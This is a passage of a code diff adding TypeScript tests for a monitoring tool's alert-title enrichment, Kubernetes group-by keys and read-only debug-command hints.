+      /*
+       * A grouped series keeps its keys even when the attribute was
+       * missing, so this is a real shape - and appending " - " to the
+       * title for it would be worse than doing nothing.
+       */
+      const title: string = "Disk usage high";
+
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title,
+          seriesLabels: { mountpoint: "", device: "" },
+        }),
+      ).toBe(title);
+    });
+
+    test("leaves a title alone when the user's own template already named the series", () => {
+      /*
+       * The user wrote `{{resource.k8s.pod.name}}` into their criteria
+       * title, which has already expanded by the time the enricher runs.
+       * Appending would duplicate the pod name.
+       */
+      const title: string =
+        "Pod checkout-7d9f-2xk in prod is throttled on ip-10-0-3-14";
+
+      expect(
+        SeriesContextEnricher.enrichTitle({ title, seriesLabels: POD_LABELS }),
+      ).toBe(title);
+    });
+
+    test("adds only the labels the title is missing", () => {
+      const enriched: string = SeriesContextEnricher.enrichTitle({
+        title: "Pod checkout-7d9f-2xk is throttled",
+        seriesLabels: POD_LABELS,
+      });
+
+      expect(enriched).toBe(
+        "Pod checkout-7d9f-2xk is throttled - Namespace: prod | Node: ip-10-0-3-14",
+      );
+      // The pod name appears once, not twice.
+      expect(enriched.split("checkout-7d9f-2xk")).toHaveLength(2);
+    });
+
+    test("running twice over its own output changes nothing", () => {
+      const once: string = SeriesContextEnricher.enrichTitle({
+        title: "Pod CPU high",
+        seriesLabels: POD_LABELS,
+      });
+      const twice: string = SeriesContextEnricher.enrichTitle({
+        title: once,
+        seriesLabels: POD_LABELS,
+      });
+
+      expect(twice).toBe(once);
+    });
+
+    test("a threshold in the title does not swallow a short label value", () => {
+      /*
+       * Ceph pool ids and Proxmox vmids are one or two characters. Naive
+       * substring matching answers "does 'Restarts > 3' mention 3?" with
+       * yes, and the alert loses the only thing identifying which pool
+       * broke.
+       */
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title: "[Ceph] Pool Near Full - restarts > 3",
+          seriesLabels: { pool_id: "3" },
+        }),
+      ).toBe("[Ceph] Pool Near Full - restarts > 3 - Pool: 3");
+    });
+
+    test("a short label value is still idempotent on a second pass", () => {
+      const once: string = SeriesContextEnricher.enrichTitle({
+        title: "[Ceph] Pool Near Full",
+        seriesLabels: { pool_id: "3" },
+      });
+
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title: once,
+          seriesLabels: { pool_id: "3" },
+        }),
+      ).toBe(once);
+    });
+
+    test("a value embedded inside a longer word does not count as mentioned", () => {
+      /*
+       * A container called `webapp` must not be considered named just
+       * because the title happens to contain the word "webapps".
+       */
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title: "All webapps are unhealthy",
+          seriesLabels: { "resource.container.name": "webapp" },
+        }),
+      ).toBe("All webapps are unhealthy - Container: webapp");
+    });
+
+    test("a value on a token boundary does count as mentioned", () => {
+      const title: string = "Container checkout-7d9f-2xk is unhealthy";
+
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title,
+          seriesLabels: { "resource.k8s.pod.name": "checkout-7d9f-2xk" },
+        }),
+      ).toBe(title);
+    });
+
+    test("never overflows the title column", () => {
+      /*
+       * `Alert.title` and `Incident.title` are LongText (500). An
+       * overflow does not shorten the title - it fails the INSERT, and
+       * the alert does not exist at all. A labelling improvement must
+       * never turn into a dropped page.
+       */
+      const longValue: string = "x".repeat(250);
+
+      const enriched: string = SeriesContextEnricher.enrichTitle({
+        title: `[K8s] ${"y".repeat(300)}`,
+        seriesLabels: {
+          "resource.k8s.pod.name": longValue,
+          "resource.k8s.namespace.name": longValue,
+          "resource.k8s.node.name": longValue,
+        },
+      });
+
+      expect(enriched.length).toBeLessThanOrEqual(500);
+    });
+
+    test("leaves an already-oversized title exactly as the user wrote it", () => {
+      /*
+       * Such a title was going to fail with or without this enricher.
+       * Silently truncating what the user wrote is not this module's
+       * call to make.
+       */
+      const title: string = "z".repeat(600);
+
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title,
+          seriesLabels: { "resource.k8s.pod.name": "web-1" },
+        }),
+      ).toBe(title);
+    });
+
+    test("handles an empty title without producing a leading separator", () => {
+      expect(
+        SeriesContextEnricher.enrichTitle({
+          title: "",
+          seriesLabels: { "resource.k8s.pod.name": "web-1" },
+        }),
+      ).toBe(" - Pod: web-1");
+    });
+  });
+
+  describe("enrichDescription", () => {
+    test("appends the full resource block and the first commands", () => {
+      const enriched: string = SeriesContextEnricher.enrichDescription({
+        description: "A pod's CPU usage has exceeded 90% of its limit.",
+        seriesLabels: POD_LABELS,
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(enriched).toContain(
+        "A pod's CPU usage has exceeded 90% of its limit.",
+      );
+      expect(enriched).toContain("**Affected resource**");
+      expect(enriched).toContain("- **Pod:** `checkout-7d9f-2xk`");
+      expect(enriched).toContain("- **Namespace:** `prod`");
+      expect(enriched).toContain("- **Node:** `ip-10-0-3-14`");
+      expect(enriched).toContain("**Start here**");
+      expect(enriched).toContain(
+        "kubectl describe pod checkout-7d9f-2xk -n prod",
+      );
+    });
+
+    test("lists EVERY label, not just the three that fit in a title", () => {
+      const enriched: string = SeriesContextEnricher.enrichDescription({
+        description: "Throttled.",
+        seriesLabels: {
+          ...POD_LABELS,
+          "resource.k8s.container.name": "app",
+          "resource.k8s.cluster.name": "prod-eu",
+        },
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(enriched).toContain("- **Container:** `app`");
+      expect(enriched).toContain("- **Cluster:** `prod-eu`");
+    });
+
+    test("is a no-op for a monitor with no group-by", () => {
+      const description: string = "etcd has no leader.";
+
+      expect(
+        SeriesContextEnricher.enrichDescription({
+          description,
+          seriesLabels: {},
+          monitorType: MonitorType.Kubernetes,
+        }),
+      ).toBe(description);
+      expect(
+        SeriesContextEnricher.enrichDescription({
+          description,
+          seriesLabels: undefined,
+          monitorType: MonitorType.Kubernetes,
+        }),
+      ).toBe(description);
+    });
+
+    test("skips the resource block when the description already names every label", () => {
+      const description: string =
+        "Pod checkout-7d9f-2xk in prod on ip-10-0-3-14 is throttled.";
+
+      const enriched: string = SeriesContextEnricher.enrichDescription({
+        description,
+        seriesLabels: POD_LABELS,
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(enriched).not.toContain("**Affected resource**");
+      // The commands are still added - they are not a restatement.
+      expect(enriched).toContain("**Start here**");
+    });
+
+    test("still adds commands for a monitor type that has them, and none for one that does not", () => {
+      const withCommands: string = SeriesContextEnricher.enrichDescription({
+        description: "High CPU.",
+        seriesLabels: { "resource.container.name": "nginx" },
+        monitorType: MonitorType.Docker,
+      });
+      const withoutCommands: string = SeriesContextEnricher.enrichDescription({
+        description: "High latency.",
+        seriesLabels: { "service.name": "checkout-api" },
+        monitorType: MonitorType.Metrics,
+      });
+
+      expect(withCommands).toContain("docker logs --tail 200 nginx");
+      expect(withoutCommands).not.toContain("**Start here**");
+      // ...but the resource identity is still there.
+      expect(withoutCommands).toContain("- **Service:** `checkout-api`");
+    });
+
+    test("running twice adds nothing the second time", () => {
+      const once: string = SeriesContextEnricher.enrichDescription({
+        description: "Throttled.",
+        seriesLabels: POD_LABELS,
+        monitorType: MonitorType.Kubernetes,
+      });
+      const twice: string = SeriesContextEnricher.enrichDescription({
+        description: once,
+        seriesLabels: POD_LABELS,
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(twice).toBe(once);
+    });
+
+    test("an empty description becomes the blocks alone, with no leading blank lines", () => {
+      const enriched: string = SeriesContextEnricher.enrichDescription({
+        description: "",
+        seriesLabels: { "resource.k8s.pod.name": "web-1" },
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(enriched.startsWith("**Affected resource**")).toBe(true);
+    });
+
+    test("separates the original description from the appended blocks", () => {
+      const enriched: string = SeriesContextEnricher.enrichDescription({
+        description: "Throttled.",
+        seriesLabels: { "resource.k8s.pod.name": "web-1" },
+        monitorType: MonitorType.Kubernetes,
+      });
+
+      expect(enriched).toContain("Throttled.\n\n**Affected resource**");
+    });
+  });
+});

--- a/Common/Tests/Types/Monitor/KubernetesAlertTemplates.test.ts
+++ b/Common/Tests/Types/Monitor/KubernetesAlertTemplates.test.ts
@@ -19,9 +19,18 @@ import ObjectID from "../../../Types/ObjectID";
  *      name (`resource.k8s.node.name`), not the bare `k8s.node.name`.
  *      OneUptime stamps OTel resource attributes with a `resource.` prefix
  *      at ingest, so the bare key would match nothing and collapse every
- *      node into one mislabeled series. The key differs per template — the
- *      HPA template groups per HPA and the pod-limit templates per pod —
- *      so each case carries its own expected key.
+ *      node into one mislabeled series. The key SET differs per template —
+ *      the HPA template groups per namespace+HPA and the pod-limit
+ *      templates per namespace+pod — so each case carries its own
+ *      expected set, and both queries must carry exactly that set or the
+ *      formula's fingerprint join silently finds nothing.
+ *
+ *      Namespace is in those sets because a Kubernetes object name is
+ *      unique only within a namespace, and because the set is also what
+ *      the resulting alert can NAME (see SeriesLabelDisplay). Node is
+ *      deliberately NOT: kubeletstats always carries it but the
+ *      k8s_cluster side only gets it from the best-effort k8sattributes
+ *      processor, and a key only one side carries breaks the join.
  *
  *   2. The aggregation differs by numerator shape:
  *        - Request utilization sums MANY container series per node, and both
@@ -53,7 +62,12 @@ interface RatioTemplateCase {
   resultAlias: string;
   aggregation: MetricsAggregationType;
   threshold: number;
-  groupBy: string;
+  /*
+   * The full group-by key SET, in order. Both queries must carry exactly
+   * this, or the two halves of the ratio hash to fingerprints that never
+   * meet and the formula silently evaluates against an empty operand.
+   */
+  groupBy: Array<string>;
 }
 
 const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
@@ -67,7 +81,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "node_cpu_request_utilization",
     aggregation: MetricsAggregationType.Sum,
     threshold: 90,
-    groupBy: "resource.k8s.node.name",
+    groupBy: ["resource.k8s.node.name"],
   },
   {
     id: "k8s-node-memory-request-utilization",
@@ -78,7 +92,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "node_memory_request_utilization",
     aggregation: MetricsAggregationType.Sum,
     threshold: 90,
-    groupBy: "resource.k8s.node.name",
+    groupBy: ["resource.k8s.node.name"],
   },
   // Usage utilization — Avg/Avg (one series per node, cross-receiver).
   {
@@ -90,7 +104,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "node_cpu_utilization",
     aggregation: MetricsAggregationType.Avg,
     threshold: 90,
-    groupBy: "resource.k8s.node.name",
+    groupBy: ["resource.k8s.node.name"],
   },
   {
     id: "k8s-high-memory",
@@ -101,17 +115,17 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "node_memory_utilization",
     aggregation: MetricsAggregationType.Avg,
     threshold: 85,
-    groupBy: "resource.k8s.node.name",
+    groupBy: ["resource.k8s.node.name"],
   },
   /*
    * Autoscaling / limit saturation — Avg/Avg, and NOT keyed on the node.
    *
-   * The HPA ratio groups per HPA object; the two pod-limit ratios group
-   * per pod. Locking the group-by key here is the point of these cases:
-   * these were the first ratio templates in this file not keyed on
-   * `resource.k8s.node.name`, so a copy-paste of the node key would
-   * silently collapse every HPA (or every pod) into one mislabeled
-   * series that still renders and still alerts.
+   * The HPA ratio groups per namespace+HPA object; the two pod-limit
+   * ratios group per namespace+pod. Locking the group-by set here is the
+   * point of these cases: these were the first ratio templates in this
+   * file not keyed on `resource.k8s.node.name`, so a copy-paste of the
+   * node key would silently collapse every HPA (or every pod) into one
+   * mislabeled series that still renders and still alerts.
    */
   {
     id: "k8s-hpa-at-max-replicas",
@@ -122,7 +136,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "hpa_replica_saturation",
     aggregation: MetricsAggregationType.Avg,
     threshold: 90,
-    groupBy: "resource.k8s.hpa.name",
+    groupBy: ["resource.k8s.namespace.name", "resource.k8s.hpa.name"],
   },
   {
     id: "k8s-pod-memory-limit-saturation",
@@ -133,7 +147,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "pod_memory_limit_saturation",
     aggregation: MetricsAggregationType.Avg,
     threshold: 90,
-    groupBy: "resource.k8s.pod.name",
+    groupBy: ["resource.k8s.namespace.name", "resource.k8s.pod.name"],
   },
   {
     id: "k8s-pod-cpu-limit-saturation",
@@ -144,7 +158,7 @@ const RATIO_TEMPLATES: Array<RatioTemplateCase> = [
     resultAlias: "pod_cpu_limit_saturation",
     aggregation: MetricsAggregationType.Avg,
     threshold: 90,
-    groupBy: "resource.k8s.pod.name",
+    groupBy: ["resource.k8s.namespace.name", "resource.k8s.pod.name"],
   },
 ];
 
@@ -225,15 +239,17 @@ describe("KubernetesAlertTemplates - per-series ratio templates", () => {
        * Decision (1): group by the resource-prefixed attribute on BOTH
        * queries so the per-series fingerprints line up for the formula join.
        */
-      expect(numerator.metricQueryData.groupByAttributeKeys).toEqual([
+      expect(numerator.metricQueryData.groupByAttributeKeys).toEqual(
         tc.groupBy,
-      ]);
-      expect(denominator.metricQueryData.groupByAttributeKeys).toEqual([
+      );
+      expect(denominator.metricQueryData.groupByAttributeKeys).toEqual(
         tc.groupBy,
-      ]);
+      );
 
-      // The `resource.` prefix is load-bearing — a bare OTel key matches nothing.
-      expect(tc.groupBy.startsWith("resource.")).toBe(true);
+      for (const key of tc.groupBy) {
+        // The `resource.` prefix is load-bearing — a bare OTel key matches nothing.
+        expect(key.startsWith("resource.")).toBe(true);
+      }
 
       // Formula divides numerator by denominator and scales to a percentage.
       expect(formulaConfigs[0].metricFormulaData.metricFormula).toBe(

--- a/Common/Tests/Types/Monitor/KubernetesTemplateGroupByKeys.test.ts
+++ b/Common/Tests/Types/Monitor/KubernetesTemplateGroupByKeys.test.ts
@@ -30,6 +30,23 @@ import ObjectID from "../../../Types/ObjectID";
  *   - Cluster-scalar templates must stay UNGROUPED. etcd leadership, API
  *     server throttling and scheduler queue depth are one value for the
  *     cluster; splitting them invents series that do not exist.
+ *
+ *   - The key set is also the ALERT'S VOCABULARY. Series labels are
+ *     stored on the alert and rendered into its title and description
+ *     (SeriesLabelDisplay / SeriesContextEnricher), so a key left out
+ *     here is a fact the on-call engineer does not get. That is why the
+ *     namespace-scoped objects group by namespace as well as their own
+ *     name: `k8s.pod.name` alone is not a Kubernetes identity, and
+ *     "Pod: checkout-7d9f-2xk" with no namespace is a `kubectl` guess.
+ *
+ *   - A key that only ONE side of a RATIO template carries is worse than
+ *     a missing label: the two queries join by series fingerprint, so
+ *     the formula silently stops producing values and the monitor stops
+ *     alerting entirely. `k8s.namespace.name` is stamped directly by
+ *     both kubeletstats and the k8s_cluster receiver and is safe;
+ *     `k8s.node.name` on the k8s_cluster side only arrives via the
+ *     best-effort k8sattributes processor and is deliberately NOT in any
+ *     ratio template's key set. See buildKubernetesRatioMonitorConfig.
  */
 
 interface TemplateGroupByCase {
@@ -42,8 +59,12 @@ interface TemplateGroupByCase {
 const EXPECTED_GROUP_BY: Array<TemplateGroupByCase> = [
   {
     id: "k8s-crashloopbackoff",
-    groupByKeys: ["resource.k8s.pod.name"],
-    why: "restarts belong to one pod's containers",
+    groupByKeys: [
+      "resource.k8s.namespace.name",
+      "resource.k8s.pod.name",
+      "resource.k8s.container.name",
+    ],
+    why: "restarts belong to one CONTAINER of one pod, and the alert has to name which",
   },
   {
     id: "k8s-pod-pending",
@@ -67,13 +88,16 @@ const EXPECTED_GROUP_BY: Array<TemplateGroupByCase> = [
   },
   {
     id: "k8s-deployment-replica-mismatch",
-    groupByKeys: ["resource.k8s.deployment.name"],
-    why: "a stuck rollout belongs to one Deployment object",
+    groupByKeys: [
+      "resource.k8s.namespace.name",
+      "resource.k8s.deployment.name",
+    ],
+    why: "a stuck rollout belongs to one Deployment object, which is namespace-scoped",
   },
   {
     id: "k8s-job-failures",
-    groupByKeys: ["resource.k8s.job.name"],
-    why: "one failing Job must not hide the next",
+    groupByKeys: ["resource.k8s.namespace.name", "resource.k8s.job.name"],
+    why: "one failing Job must not hide the next; Job names repeat across namespaces",
   },
   {
     id: "k8s-etcd-no-leader",
@@ -97,8 +121,8 @@ const EXPECTED_GROUP_BY: Array<TemplateGroupByCase> = [
   },
   {
     id: "k8s-daemonset-unavailable",
-    groupByKeys: ["resource.k8s.daemonset.name"],
-    why: "the incident names one DaemonSet",
+    groupByKeys: ["resource.k8s.namespace.name", "resource.k8s.daemonset.name"],
+    why: "the incident names one DaemonSet, which is namespace-scoped",
   },
   {
     id: "k8s-node-cpu-request-utilization",
@@ -112,18 +136,18 @@ const EXPECTED_GROUP_BY: Array<TemplateGroupByCase> = [
   },
   {
     id: "k8s-hpa-at-max-replicas",
-    groupByKeys: ["resource.k8s.hpa.name"],
-    why: "saturation belongs to one HPA object",
+    groupByKeys: ["resource.k8s.namespace.name", "resource.k8s.hpa.name"],
+    why: "saturation belongs to one HPA object, which is namespace-scoped",
   },
   {
     id: "k8s-pod-memory-limit-saturation",
-    groupByKeys: ["resource.k8s.pod.name"],
-    why: "the pod about to be OOMKilled is the one to page on",
+    groupByKeys: ["resource.k8s.namespace.name", "resource.k8s.pod.name"],
+    why: "the pod about to be OOMKilled is the one to page on, and a pod name alone is not an identity",
   },
   {
     id: "k8s-pod-cpu-limit-saturation",
-    groupByKeys: ["resource.k8s.pod.name"],
-    why: "the throttled pod is the one to page on",
+    groupByKeys: ["resource.k8s.namespace.name", "resource.k8s.pod.name"],
+    why: "the throttled pod is the one to page on, and a pod name alone is not an identity",
   },
 ];
 
@@ -204,6 +228,63 @@ describe("KubernetesAlertTemplates - per-series group-by keys", () => {
       }
     },
   );
+
+  /*
+   * Kubernetes object names are unique per (namespace, kind), not
+   * globally. A template that groups by a namespace-scoped object's name
+   * alone therefore does two wrong things at once: two same-named
+   * objects in different namespaces collapse into one series (so the
+   * second one's breach is silenced behind the first one's open alert),
+   * and the alert it does raise cannot be acted on without guessing the
+   * namespace.
+   */
+  const NAMESPACE_SCOPED_OBJECT_KEYS: Array<string> = [
+    "resource.k8s.pod.name",
+    "resource.k8s.container.name",
+    "resource.k8s.deployment.name",
+    "resource.k8s.statefulset.name",
+    "resource.k8s.daemonset.name",
+    "resource.k8s.job.name",
+    "resource.k8s.cronjob.name",
+    "resource.k8s.hpa.name",
+  ];
+
+  test.each(
+    EXPECTED_GROUP_BY.filter((tc: TemplateGroupByCase) => {
+      return tc.groupByKeys.some((key: string) => {
+        return NAMESPACE_SCOPED_OBJECT_KEYS.includes(key);
+      });
+    }),
+  )(
+    "$id groups a namespace-scoped object and therefore also by namespace",
+    (tc: TemplateGroupByCase) => {
+      expect(tc.groupByKeys).toContain("resource.k8s.namespace.name");
+    },
+  );
+
+  test("every query of a template shares one group-by key set", () => {
+    /*
+     * Ratio templates join their two queries by series fingerprint,
+     * which is computed from this key set. Two queries with different
+     * key sets produce fingerprints that never meet, the formula
+     * evaluates against an empty operand, and the monitor stops
+     * alerting without any error anywhere.
+     */
+    for (const template of getAllKubernetesAlertTemplates()) {
+      const step: MonitorStep = template.getMonitorStep(buildArgs());
+
+      const keySets: Array<string> = (
+        (step.data?.kubernetesMonitor?.metricViewConfig?.queryConfigs ||
+          []) as Array<any>
+      ).map((queryConfig: any) => {
+        return JSON.stringify(
+          queryConfig.metricQueryData.groupByAttributeKeys || [],
+        );
+      });
+
+      expect(new Set(keySets).size).toBeLessThanOrEqual(1);
+    }
+  });
 
   test("grouped templates are the majority of the shipped set", () => {
     const grouped: number = EXPECTED_GROUP_BY.filter(

--- a/Common/Tests/Types/Monitor/Recommendation/MonitorRecommendationAlertDebuggability.test.ts
+++ b/Common/Tests/Types/Monitor/Recommendation/MonitorRecommendationAlertDebuggability.test.ts
@@ -1,0 +1,319 @@
+import { JSONObject } from "../../../../Types/JSON";
+import MonitorCriteriaInstance from "../../../../Types/Monitor/MonitorCriteriaInstance";
+import MonitorStep from "../../../../Types/Monitor/MonitorStep";
+import MonitorType from "../../../../Types/Monitor/MonitorType";
+import ObjectID from "../../../../Types/ObjectID";
+import MonitorRecommendationCatalog from "../../../../Types/Monitor/Recommendation/MonitorRecommendationCatalog";
+import {
+  MonitorRecommendation,
+  MonitorRecommendationArgs,
+} from "../../../../Types/Monitor/Recommendation/MonitorRecommendationTypes";
+import SeriesDebugHints from "../../../../Types/Monitor/SeriesContext/SeriesDebugHints";
+import SeriesLabelDisplay, {
+  DisplaySeriesLabel,
+} from "../../../../Types/Monitor/SeriesContext/SeriesLabelDisplay";
+import SeriesContextEnricher from "../../../../Server/Utils/Monitor/SeriesContextEnricher";
+
+/*
+ * End-to-end guard on the thing the recommendations exist for: an alert
+ * an SRE can act on without opening anything else.
+ *
+ * Every monitor on the reporting project's alert list was created from a
+ * recommendation, and all forty-nine of its alerts read
+ *
+ *   "[K8s] Pod CPU Saturating Container Limit (>90%) - oneuptime-test -
+ *    Pod CPU Saturating Container Limit"
+ *
+ * with no pod, no container and no node anywhere in the title. Three
+ * separate things had to be true for that, and this file asserts all
+ * three across EVERY shipped template rather than for one of them:
+ *
+ *   1. The template groups by enough to identify the thing that broke.
+ *   2. Every key it groups by is one the display layer can name, so the
+ *      alert says "Pod", not "resource.k8s.pod.name".
+ *   3. Rendering the template's own title through the alert-creation path
+ *      actually produces a title carrying that identity.
+ *
+ * It runs against the CATALOG rather than the individual template
+ * modules, so a new resource type is covered the day it is registered.
+ */
+
+function buildArgs(): MonitorRecommendationArgs {
+  return {
+    resourceIdentifier: "test-resource",
+    onlineMonitorStatusId: ObjectID.generate(),
+    offlineMonitorStatusId: ObjectID.generate(),
+    defaultIncidentSeverityId: ObjectID.generate(),
+    defaultAlertSeverityId: ObjectID.generate(),
+    monitorName: "Test Monitor",
+  };
+}
+
+interface TemplateCase {
+  recommendationId: string;
+  monitorType: MonitorType;
+  step: MonitorStep;
+  groupByKeys: Array<string>;
+}
+
+const ALL_TEMPLATE_CASES: Array<TemplateCase> =
+  MonitorRecommendationCatalog.getAllRecommendations().map(
+    (recommendation: MonitorRecommendation): TemplateCase => {
+      const step: MonitorStep = recommendation.getMonitorStep(buildArgs());
+
+      return {
+        recommendationId: recommendation.recommendationId,
+        monitorType: recommendation.monitorType,
+        step,
+        groupByKeys: MonitorStep.getGroupByAttributeKeys(step),
+      };
+    },
+  );
+
+const GROUPED_TEMPLATE_CASES: Array<TemplateCase> = ALL_TEMPLATE_CASES.filter(
+  (testCase: TemplateCase) => {
+    return testCase.groupByKeys.length > 0;
+  },
+);
+
+/*
+ * Stand-in values for a series. Real label values are opaque strings, so
+ * a per-key synthetic value is enough to prove the identity reaches the
+ * title - and using the key itself as the seed makes a failure message
+ * say exactly which label went missing.
+ */
+function buildSeriesLabels(groupByKeys: Array<string>): JSONObject {
+  const labels: JSONObject = {};
+
+  for (const key of groupByKeys) {
+    labels[key] = `value-for-${SeriesLabelDisplay.normalizeKey(key)}`;
+  }
+
+  return labels;
+}
+
+function getCriteriaInstances(
+  step: MonitorStep,
+): Array<MonitorCriteriaInstance> {
+  return step.data?.monitorCriteria?.data?.monitorCriteriaInstanceArray || [];
+}
+
+describe("Recommendation templates produce debuggable alerts", () => {
+  test("the catalog actually has templates to check", () => {
+    // A silently-empty catalog would make every test.each below vacuous.
+    expect(ALL_TEMPLATE_CASES.length).toBeGreaterThan(50);
+    expect(GROUPED_TEMPLATE_CASES.length).toBeGreaterThan(30);
+  });
+
+  describe("every group-by key is a key the alert can name", () => {
+    test.each(GROUPED_TEMPLATE_CASES)(
+      "$recommendationId",
+      (testCase: TemplateCase) => {
+        for (const key of testCase.groupByKeys) {
+          /*
+           * `getFriendlyLabelName` never fails - it falls back to a
+           * prettified form of the raw key. That fallback is the right
+           * behaviour for a user's own custom attribute, but for a
+           * SHIPPED template it means nobody registered the key, and the
+           * alert reads "K8s Pod Name: web-1" instead of "Pod: web-1".
+           */
+          expect(SeriesLabelDisplay.isKnownLabelKey(key)).toBe(true);
+
+          // ...and the registered name is actually usable in a sentence.
+          expect(
+            SeriesLabelDisplay.getFriendlyLabelName(key).length,
+          ).toBeGreaterThan(0);
+        }
+      },
+    );
+  });
+
+  describe("every grouped template's alert title names the resource", () => {
+    test.each(GROUPED_TEMPLATE_CASES)(
+      "$recommendationId",
+      (testCase: TemplateCase) => {
+        const seriesLabels: JSONObject = buildSeriesLabels(
+          testCase.groupByKeys,
+        );
+
+        const criteriaInstances: Array<MonitorCriteriaInstance> =
+          getCriteriaInstances(testCase.step);
+
+        const alertTitles: Array<string> = criteriaInstances.flatMap(
+          (instance: MonitorCriteriaInstance) => {
+            return (instance.data?.alerts || []).map(
+              (alert: { title: string }) => {
+                return alert.title;
+              },
+            );
+          },
+        );
+
+        expect(alertTitles.length).toBeGreaterThan(0);
+
+        for (const title of alertTitles) {
+          const enriched: string = SeriesContextEnricher.enrichTitle({
+            title,
+            seriesLabels,
+          });
+
+          /*
+           * The single most-identifying label must be in the title. The
+           * rest are in the description block and the Affected Resource
+           * table; the title only has room for the top few.
+           */
+          const topLabel: DisplaySeriesLabel =
+            SeriesLabelDisplay.getDisplayLabels(seriesLabels)[0]!;
+
+          expect(enriched).toContain(topLabel.value);
+          expect(enriched).not.toContain("{{");
+        }
+      },
+    );
+  });
+
+  describe("every grouped template's alert description carries the full identity", () => {
+    test.each(GROUPED_TEMPLATE_CASES)(
+      "$recommendationId",
+      (testCase: TemplateCase) => {
+        const seriesLabels: JSONObject = buildSeriesLabels(
+          testCase.groupByKeys,
+        );
+
+        const descriptions: Array<string> = getCriteriaInstances(
+          testCase.step,
+        ).flatMap((instance: MonitorCriteriaInstance) => {
+          return (instance.data?.alerts || []).map(
+            (alert: { description: string }) => {
+              return alert.description;
+            },
+          );
+        });
+
+        for (const description of descriptions) {
+          const enriched: string = SeriesContextEnricher.enrichDescription({
+            description,
+            seriesLabels,
+            monitorType: testCase.monitorType,
+          });
+
+          // EVERY label, not just the ones that fit in a title.
+          for (const label of SeriesLabelDisplay.getDisplayLabels(
+            seriesLabels,
+          )) {
+            expect(enriched).toContain(label.value);
+          }
+        }
+      },
+    );
+  });
+
+  describe("incident titles get the same treatment as alert titles", () => {
+    test.each(GROUPED_TEMPLATE_CASES)(
+      "$recommendationId",
+      (testCase: TemplateCase) => {
+        const seriesLabels: JSONObject = buildSeriesLabels(
+          testCase.groupByKeys,
+        );
+
+        const incidentTitles: Array<string> = getCriteriaInstances(
+          testCase.step,
+        ).flatMap((instance: MonitorCriteriaInstance) => {
+          return (instance.data?.incidents || []).map(
+            (incident: { title: string }) => {
+              return incident.title;
+            },
+          );
+        });
+
+        const topLabel: DisplaySeriesLabel =
+          SeriesLabelDisplay.getDisplayLabels(seriesLabels)[0]!;
+
+        for (const title of incidentTitles) {
+          expect(
+            SeriesContextEnricher.enrichTitle({ title, seriesLabels }),
+          ).toContain(topLabel.value);
+        }
+      },
+    );
+  });
+
+  describe("infrastructure templates hand the engineer a first command", () => {
+    /*
+     * The monitor types where a read-only inspection command is both
+     * universally correct and genuinely the next thing to run. Metrics /
+     * IoT / RUM / Service series identify an application-level entity
+     * with no such command, and are deliberately excluded rather than
+     * given a guess.
+     */
+    const TYPES_WITH_COMMANDS: Array<MonitorType> = [
+      MonitorType.Kubernetes,
+      MonitorType.Docker,
+      MonitorType.Podman,
+      MonitorType.DockerSwarm,
+      MonitorType.Host,
+      MonitorType.Proxmox,
+      MonitorType.Ceph,
+    ];
+
+    const CASES: Array<TemplateCase> = GROUPED_TEMPLATE_CASES.filter(
+      (testCase: TemplateCase) => {
+        return TYPES_WITH_COMMANDS.includes(testCase.monitorType);
+      },
+    );
+
+    test("there are infrastructure templates to check", () => {
+      expect(CASES.length).toBeGreaterThan(20);
+    });
+
+    test.each(CASES)("$recommendationId", (testCase: TemplateCase) => {
+      const commands: Array<string> = SeriesDebugHints.getDebugCommands({
+        monitorType: testCase.monitorType,
+        seriesLabels: buildSeriesLabels(testCase.groupByKeys),
+      }).map((command: { command: string }) => {
+        return command.command;
+      });
+
+      expect(commands.length).toBeGreaterThan(0);
+
+      for (const command of commands) {
+        // No half-filled interpolation reaches a copy-paste button.
+        expect(command).not.toMatch(/\s\s/);
+        expect(command.trim()).toBe(command);
+      }
+    });
+  });
+
+  describe("ungrouped templates stay untouched", () => {
+    const UNGROUPED: Array<TemplateCase> = ALL_TEMPLATE_CASES.filter(
+      (testCase: TemplateCase) => {
+        return testCase.groupByKeys.length === 0;
+      },
+    );
+
+    test("some templates are legitimately whole-resource", () => {
+      /*
+       * etcd leadership, API server throttling, scheduler backlog: one
+       * value for the cluster. If this ever hits zero, something has
+       * started inventing series that do not exist.
+       */
+      expect(UNGROUPED.length).toBeGreaterThan(0);
+    });
+
+    test.each(UNGROUPED)(
+      "$recommendationId keeps its title verbatim",
+      (testCase: TemplateCase) => {
+        for (const instance of getCriteriaInstances(testCase.step)) {
+          for (const alert of instance.data?.alerts || []) {
+            expect(
+              SeriesContextEnricher.enrichTitle({
+                title: alert.title,
+                seriesLabels: {},
+              }),
+            ).toBe(alert.title);
+          }
+        }
+      },
+    );
+  });
+});

--- a/Common/Tests/Types/Monitor/SeriesContext/SeriesDebugHints.test.ts
+++ b/Common/Tests/Types/Monitor/SeriesContext/SeriesDebugHints.test.ts
@@ -1,0 +1,661 @@
+import { JSONObject } from "../../../../Types/JSON";
+import MonitorType from "../../../../Types/Monitor/MonitorType";
+import SeriesDebugHints, {
+  SeriesDebugCommand,
+} from "../../../../Types/Monitor/SeriesContext/SeriesDebugHints";
+
+/*
+ * These commands are printed into an alert description and rendered on
+ * the alert page with a Copy button, which makes them the highest-trust
+ * text OneUptime emits: a tired engineer pastes them into a production
+ * shell without reading. Three invariants therefore matter more than the
+ * exact wording of any one command, and each has its own block below:
+ *
+ *   1. READ-ONLY. Nothing here may mutate, restart or delete.
+ *
+ *   2. NEVER HALF-FILLED. A command is emitted only when every
